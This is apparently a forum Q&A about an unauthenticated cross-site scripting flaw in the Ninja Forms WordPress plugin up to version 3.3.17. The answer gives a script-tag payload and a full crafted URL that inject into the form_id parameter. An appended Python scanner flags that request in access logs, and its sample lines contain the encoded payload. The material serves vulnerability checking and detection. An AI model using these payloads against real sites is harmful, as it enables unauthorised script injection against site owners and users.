+1 vote
by (111 points)
Ninja Forms <= 3.3.17 is vulnerable to Unauthenticated Cross-Site Scripting. How can I check this?

1 Answer

0 votes
by (172 points)

You can check whether your site is vulnerable or not by inserting the payload

"><script>alert(document.domain);</script>

in the "form_id" parameter like this.

http://wordpresssite/wp-admin/edit.php?post_status=all&post_type=nf_sub&form_id=1"><script>alert(document.domain);</script>&nf_form_filter&paged=1
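
A defender-side check for the request described in the answer, as an added example that is not part of the original post: it scans web access logs for requests to the `nf_sub` submissions list whose `form_id` is not a plain number. The combined log format, the sample log lines, the function names and the premise that a legitimate `form_id` is always numeric are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Mar/2019:23:01:10 +0000] "GET /wp-admin/edit.php?post_status=all'
    '&post_type=nf_sub&form_id=1&nf_form_filter&paged=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Mar/2019:23:08:47 +0000] "GET /wp-admin/edit.php?post_status=all'
    '&post_type=nf_sub&form_id=1%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E'
    '&nf_form_filter&paged=1 HTTP/1.1" 200 5301',
    '203.0.113.7 - - [15/Mar/2019:23:09:02 +0000] "GET /wp-admin/edit.php?post_type=page'
    '&form_id=abc HTTP/1.1" 200 4800',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_RE = re.compile(r"[0-9]+")


def suspicious_form_id(target):
    """Return the decoded form_id when a request to the nf_sub submissions
    list carries a non-numeric form_id; otherwise return None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/edit.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "nf_sub" not in params.get("post_type", []):
        return None
    for value in params.get("form_id", []):
        # Assumption: a legitimate form_id is a plain integer, as in form_id=1.
        if value and not NUMERIC_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_form_id) for every suspicious request line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_form_id(match.group(1))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric form_id: {value!r}")
```
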
